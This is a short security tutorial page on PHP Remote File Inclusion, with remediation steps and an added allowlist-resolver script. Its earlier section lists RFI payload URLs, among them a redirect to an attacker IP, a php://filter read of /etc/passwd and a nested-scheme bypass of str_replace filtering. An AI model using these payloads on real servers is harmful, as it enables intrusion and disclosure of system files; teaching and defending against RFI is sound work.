Remote File Inclusion
Also known as RFI, this vulnerability lets an attacker redirect the server's file-loading actions to or from another server.
Here we find a typical process for leveraging this vulnerability:
Redirect actions of a server via URL parameters
#It's searching for a file
http://$url/$query?$param=hola.php
#We can do a redirection to another site
http://$url/$query?$param=http://$url
#Or a redirection to a local server
http://$url/$query?$param=//$myip
Sometimes we will need to check the page source code to see how the input is handled.
Here we find that the code tries to block connections over the HTTP protocol by stripping the scheme from the input:
...
$file = str_replace( array( "http://", "https://" ), "", $file );
...
In this case, we can try another connection protocol (a different stream wrapper):
http://$url/$query?$param=php://filter/resource=/etc/passwd
Also, if we use hthttp://tp://, the single-pass replacement removes the inner http:// and leaves us with http:// anyway, so this verification is bypassed as well:
http://$url/$query?$param=hthttp://tp://$url
Remediation Actions
Disable remote file inclusion features in the language/platform; for example, set allow_url_include = Off in the PHP configuration.
Avoid using user input to construct an include or require path.
Validate user input against a strict whitelist of known safe file names or identifiers.
Use static file paths instead of dynamically generating them from input.
Sanitize input by allowing only expected characters (alphanumeric only: no dots, slashes, or protocol prefixes).
Ensure proper file path resolution and canonicalize the path before use.
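The following is an added example, not code from the original page. It puts the page's str_replace scheme-stripping check next to a strict allowlist resolver that applies the remediation steps above, and runs both over constructed inputs shaped like the payloads shown earlier (the bypass in the previous section and the remediation list are both covered by this one script). The function names weak_strip_scheme and resolve_page, the $allowedPages map, and the temporary pages/ directory are assumptions made for the demonstration.

```php
<?php
// Added example (not from the original page). Compares a weak scheme-stripping
// check with a strict allowlist resolver. Names and the pages/ fixture are
// assumptions for this demo.

// Weak check, as in the page's snippet: a single pass of str_replace. It never
// touches php://, ftp:// or //host forms, and a nested scheme survives the pass.
function weak_strip_scheme(string $file): string
{
    return str_replace(['http://', 'https://'], '', $file);
}

// Strict resolver: the request carries a short identifier, never a path.
// The identifier is mapped to a static filename we chose, and the resolved file
// must canonicalize to a location inside $baseDir.
function resolve_page(string $param, array $allowed, string $baseDir): ?string
{
    // Step 1: only lowercase alphanumerics and underscore, bounded length.
    if (!preg_match('/^[a-z0-9_]{1,32}$/', $param)) {
        return null;
    }
    // Step 2: must be a known key; user input never becomes part of the path.
    if (!array_key_exists($param, $allowed)) {
        return null;
    }
    // Step 3: canonicalize and confirm containment inside the base directory.
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . $allowed[$param]);
    if ($base === false || $real === false) {
        return null;
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Constructed fixture so the script runs offline: a temp dir with one page.
$baseDir = sys_get_temp_dir() . '/rfi_demo_' . getmypid();
mkdir($baseDir . '/pages', 0700, true);
file_put_contents($baseDir . '/pages/home.php', "<?php echo 'home page';\n");

$allowedPages = [
    'home' => 'home.php',   // only keys in this map are ever included
];

// Constructed inputs following the payload shapes on the page
// (example.invalid and 203.0.113.5 are reserved documentation values).
$samples = [
    'home',
    'hola.php',
    'http://example.invalid/x',
    '//203.0.113.5/x',
    'php://filter/resource=/etc/passwd',
    'hthttp://tp://example.invalid/x',
    '../../etc/passwd',
];

foreach ($samples as $s) {
    $weak   = weak_strip_scheme($s);
    $strict = resolve_page($s, $allowedPages, $baseDir . '/pages');
    printf("%-36s weak -> %-30s strict -> %s\n",
        $s, $weak, $strict === null ? 'REJECTED' : 'include ' . basename($strict));
}

// Remove the constructed fixture.
unlink($baseDir . '/pages/home.php');
rmdir($baseDir . '/pages');
rmdir($baseDir);
```

Running it shows the weak check turning hthttp://tp://example.invalid/x back into http://example.invalid/x and leaving the php:// and //host inputs untouched, while resolve_page accepts only the key home and rejects everything else before any string reaches include. The allow_url_include = Off setting from the list above remains a worthwhile second layer, but the resolver is the primary control because user-supplied text never becomes part of a path.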